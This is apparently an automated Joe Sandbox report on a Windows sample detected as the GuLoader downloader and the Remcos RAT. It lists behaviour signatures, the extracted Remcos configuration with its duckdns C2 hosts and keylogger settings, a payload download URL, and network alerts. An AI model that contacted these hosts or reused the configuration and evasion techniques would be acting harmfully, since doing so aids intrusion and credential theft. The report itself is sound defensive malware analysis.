Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z120X20SO__UK__EKMELAMA.exe

Overview

General Information

Sample name:z120X20SO__UK__EKMELAMA.exe
Analysis ID:1549086
MD5:cba1a6515c0ac0889f04664fedaec3e3
SHA1:ff6672ec2a7960cfee821abedf3f2ca71e396206
SHA256:b39398684ecb03eb8ec7e1288b01cb1cd0d14b263ccb3579456592c1b234617b
Tags:exeuser-Porcupine
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • z120X20SO__UK__EKMELAMA.exe (PID: 6980 cmdline: "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe" MD5: CBA1A6515C0AC0889F04664FEDAEC3E3)
    • z120X20SO__UK__EKMELAMA.exe (PID: 5500 cmdline: "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe" MD5: CBA1A6515C0AC0889F04664FEDAEC3E3)
      • z120X20SO__UK__EKMELAMA.exe (PID: 2640 cmdline: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\ncfbreymgdrzyrcdisjodicyn" MD5: CBA1A6515C0AC0889F04664FEDAEC3E3)
      • z120X20SO__UK__EKMELAMA.exe (PID: 5956 cmdline: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\qekmsxigulkljfqhsveponxhojry" MD5: CBA1A6515C0AC0889F04664FEDAEC3E3)
      • z120X20SO__UK__EKMELAMA.exe (PID: 6164 cmdline: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\aypetpthqtcqlmmtjgrrrasywyazfan" MD5: CBA1A6515C0AC0889F04664FEDAEC3E3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["gerfourt99lahjou1.duckdns.org:3487:0", "gerfourt99lahjou1.duckdns.org:3488:1", "gerfourt99lahjou2.duckdns.org:3487:0"], "Assigned name": "ReBorn", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "kajoutr-APT2XH", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kaourts.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\kaourts.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.2278025143.0000000004C7D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: z120X20SO__UK__EKMELAMA.exe PID: 5500JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Process Memory Space: z120X20SO__UK__EKMELAMA.exe PID: 5500JoeSecurity_RemcosYara detected Remcos RATJoe Security
            Process Memory Space: z120X20SO__UK__EKMELAMA.exe PID: 2640JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Melosa\Tabelopstninger.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe, ProcessId: 5500, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Alcohol
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Melosa\Tabelopstninger.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe, ProcessId: 5500, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Alcohol
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T10:02:16.933912+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449730TCP
              2024-11-05T10:02:55.512839+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449736TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T10:03:27.174011+010020327761Malware Command and Control Activity Detected192.168.2.449893172.111.244.1323487TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T10:03:28.063052+010020327771Malware Command and Control Activity Detected172.111.244.1323487192.168.2.449893TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T10:03:29.094727+010028033043Unknown Traffic192.168.2.449901178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T10:03:22.993720+010028032702Potentially Bad Traffic192.168.2.449866104.21.24.1780TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["gerfourt99lahjou1.duckdns.org:3487:0", "gerfourt99lahjou1.duckdns.org:3488:1", "gerfourt99lahjou2.duckdns.org:3487:0"], "Assigned name": "ReBorn", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "kajoutr-APT2XH", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kaourts.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}
              Source: Yara matchFile source: 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: z120X20SO__UK__EKMELAMA.exe PID: 5500, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kaourts.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,6_2_00404423
              Source: z120X20SO__UK__EKMELAMA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.24.17:443 -> 192.168.2.4:49868 version: TLS 1.2
              Source: z120X20SO__UK__EKMELAMA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_0040646B FindFirstFileA,FindClose,4_2_0040646B
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004058BF
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_368510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_368510F1
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0040AE51 FindFirstFileW,FindNextFileW,6_2_0040AE51
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407EF8
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407898

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49893 -> 172.111.244.132:3487
              Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 172.111.244.132:3487 -> 192.168.2.4:49893
              Source: Malware configuration extractorURLs: gerfourt99lahjou1.duckdns.org
              Source: Malware configuration extractorURLs: gerfourt99lahjou1.duckdns.org
              Source: Malware configuration extractorURLs: gerfourt99lahjou2.duckdns.org
              Source: unknownDNS query: name: gerfourt99lahjou1.duckdns.org
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 104.21.24.17 104.21.24.17
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: M247GB M247GB
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49866 -> 104.21.24.17:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49901 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49730
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49736
              Source: global trafficHTTP traffic detected: GET /xeInzY158.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: kinltd.topConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xeInzY158.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kinltd.topCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xeInzY158.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: kinltd.topConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xeInzY158.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kinltd.topCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2935846191.0000000036820000.00000040.10000000.00040000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: z120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: z120X20SO__UK__EKMELAMA.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: z120X20SO__UK__EKMELAMA.exe, 00000006.00000003.2608802815.0000000000B5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ogout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: z120X20SO__UK__EKMELAMA.exe, 00000006.00000003.2608802815.0000000000B5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ogout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: bhv9ED5.tmp.6.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhv9ED5.tmp.6.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2935707605.0000000036730000.00000040.10000000.00040000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2935707605.0000000036730000.00000040.10000000.00040000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: kinltd.top
              Source: global trafficDNS traffic detected: DNS query: gerfourt99lahjou1.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2583060102.0000000005500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/j
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2583060102.0000000005500000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2813652068.0000000005502000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2592319206.0000000005500000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpH
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpL
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2583060102.0000000005500000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2813652068.0000000005502000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2592319206.0000000005500000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/son.gpT
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916743463.0000000007090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://kinltd.top/xeInzY158.bin
              Source: z120X20SO__UK__EKMELAMA.exe, Tabelopstninger.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: z120X20SO__UK__EKMELAMA.exe, Tabelopstninger.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: z120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: z120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000003.2595387995.000000000056D000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000003.2595293786.000000000056D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2935846191.0000000036820000.00000040.10000000.00040000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2935846191.0000000036820000.00000040.10000000.00040000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: z120X20SO__UK__EKMELAMA.exe, 00000008.00000003.2595387995.000000000056D000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000003.2595293786.000000000056D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
              Source: bhv9ED5.tmp.6.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
              Source: z120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609250206.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
              Source: bhv9ED5.tmp.6.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
